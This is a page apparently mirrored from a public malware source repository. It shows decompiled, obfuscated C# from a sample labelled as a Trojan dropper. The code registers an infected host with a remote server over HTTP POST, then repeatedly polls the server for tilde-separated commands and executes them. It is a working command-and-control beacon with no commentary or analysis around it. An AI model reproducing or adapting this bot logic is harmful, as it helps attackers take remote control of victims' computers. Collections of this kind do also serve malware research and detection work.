mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
150 lines
4.4 KiB
C#
150 lines
4.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0008;
|
|||
|
using \u000E;
|
|||
|
using System;
|
|||
|
using System.IO;
|
|||
|
using System.Net;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u000E
|
|||
|
{
|
|||
|
internal sealed class \u0008 : \u0003
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal new static \u0002 \u0001;
|
|||
|
public static \u000E.\u0001 \u0001;
|
|||
|
|
|||
|
public void \u000F()
|
|||
|
{
|
|||
|
this.\u0010();
|
|||
|
// ISSUE: method pointer
|
|||
|
new Thread(new ThreadStart((object) this, __methodptr(\u0011))).Start();
|
|||
|
}
|
|||
|
|
|||
|
public void \u000F([In] int obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7872) + \u000F.\u0001.\u0001.\u0007.ToString() + \u000E.\u0008.\u0001(7889) + (object) obj0);
|
|||
|
|
|||
|
public void \u000F([In] string obj0, [In] string obj1) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7894) + obj0 + \u000E.\u0008.\u0001(7907) + obj1 + \u000E.\u0008.\u0001(7912) + \u000E.\u0008.\u0001.\u000E.ToString());
|
|||
|
|
|||
|
public void \u0010([In] string obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7921) + \u000E.\u0008.\u0001.\u000E.ToString() + \u000E.\u0008.\u0001(7938) + obj0.ToString());
|
|||
|
|
|||
|
private void \u0010()
|
|||
|
{
|
|||
|
string str = \u000E.\u0008.\u0001(7947) + \u000F.\u0001.\u0001.\u0007 + \u000E.\u0008.\u0001(7964) + \u000F.\u0001.\u0001.\u000E + \u000E.\u0008.\u0001(7977) + \u000F.\u0001.\u0001.\u0005 + \u000E.\u0008.\u0001(7990) + \u000F.\u0001.\u0001.\u0008;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u000F(\u000F.\u0001.\u0001.\u0006, str);
|
|||
|
break;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void \u0011()
|
|||
|
{
|
|||
|
string str1 = \u000E.\u0008.\u0001(7999) + \u000F.\u0001.\u0001.\u0007;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str2 = this.\u000F(\u000F.\u0001.\u0001.\u0006, str1);
|
|||
|
if (str2.Length > 0)
|
|||
|
{
|
|||
|
int num = 0;
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (char ch in str2)
|
|||
|
{
|
|||
|
if (ch.ToString() == \u000E.\u0008.\u0001(1797))
|
|||
|
++num;
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
for (int index = 0; index < num; ++index)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u000F(str2.Split('~')[index].Replace(\u000E.\u0008.\u0001(1797), \u000E.\u0008.\u0001(1009)));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u0008.\u0010();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0002.\u0010();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u000F.\u0007.\u0010();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0003.\u0010();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private string \u000F([In] string obj0, [In] string obj1)
|
|||
|
{
|
|||
|
ServicePointManager.Expect100Continue = false;
|
|||
|
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(obj0);
|
|||
|
httpWebRequest.ContentType = \u000E.\u0008.\u0001(8016);
|
|||
|
httpWebRequest.Method = \u000E.\u0008.\u0001(8061);
|
|||
|
httpWebRequest.UserAgent = \u000F.\u0001.\u0001.\u0004;
|
|||
|
byte[] bytes = Encoding.Default.GetBytes(obj1);
|
|||
|
httpWebRequest.ContentLength = (long) bytes.Length;
|
|||
|
Stream requestStream = httpWebRequest.GetRequestStream();
|
|||
|
requestStream.Write(bytes, 0, bytes.Length);
|
|||
|
requestStream.Close();
|
|||
|
WebResponse response = httpWebRequest.GetResponse();
|
|||
|
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
|
|||
|
}
|
|||
|
|
|||
|
static \u0008()
|
|||
|
{
|
|||
|
\u0003.\u000F();
|
|||
|
\u000E.\u0008.\u0001 = new \u000E.\u0001();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|